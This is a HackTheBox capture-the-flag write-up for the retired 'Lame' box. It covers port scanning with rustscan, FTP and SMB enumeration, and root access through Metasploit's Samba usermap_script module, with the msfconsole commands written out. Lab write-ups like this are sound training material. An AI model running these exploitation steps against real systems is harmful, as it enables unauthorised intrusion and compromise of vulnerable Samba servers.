Lame

Lame writeup by Thamizhiniyan C S

Overview

Hello everyone, In this writeup we are going to solve Lame from HackTheBox.

Link for the machine : https://app.hackthebox.com/machines/1

Lets Start 🙌

Connect to the HTB server by using the OpenVpn configuration file that’s generated by HTB.

[ Click Here to learn more about how to connect to vpn and access the boxes. ]

After connecting to the vpn service, click on Join Machine to access the machine’s ip.

After joining the machine you can see the IP Address of the target machine.


Reconnaissance

Rustscan

First start the reconnaissance by running rustscan on the target IP address.

Command: rustscan -a 10.10.10.3 -- -A -Pn

Results

From the results, we got the following ports and services running:

PortServiceVersion

21

FTP

vsftpd 2.3.4

22

SSH

OpenSSH 4.7p1

139

netbios-ssn

Samba smbd 3.X - 4.X

445

netbios-ssn

Samba smbd 3.X - 4.X

3632

distccd

distccd v1


Enumerating FTP

First, I started enumerating the FTP service running on Port 21.

From the scan results, we can see that the Anonymous login is allowed for FTP.

So I tried to login as Anonymous

Command: ftp 10.10.10.3

username: Anonymous

Password: Anonymous

Found nothing in the FTP anonymous Login.


Enumerating SMB

Next I started to enumerate SMB service running on port 139. I used enum4linux tool to enumerate.

Command: enum4linux -a 10.10.10.3

From the response of enum4linux, I didn’t found any interesting shares.


Initial Access

Next, I searched for exploits for the samba version: Samba smbd 3.X - 4.X and found the this version is vulnerable to command execution.

To use the above exploit, execute the commands in msfconsole as follows:

use exploit/multi/samba/usermap_script

set RHOSTS 10.10.10.3

set LHOST tun0 ( Here tun0 is your hackthebox vpn tunnel IP )

run


Getting the User Flag

Now we have got access to the target machine as root. I searched for the user flag using the following command:

command: find / -name user.txt

And we have found the user flag.


Getting the Root Flag

Now I searched for the root flag using the same method and found the root flag:

We have successfully found all the flags.

Thank You !!!

Last updated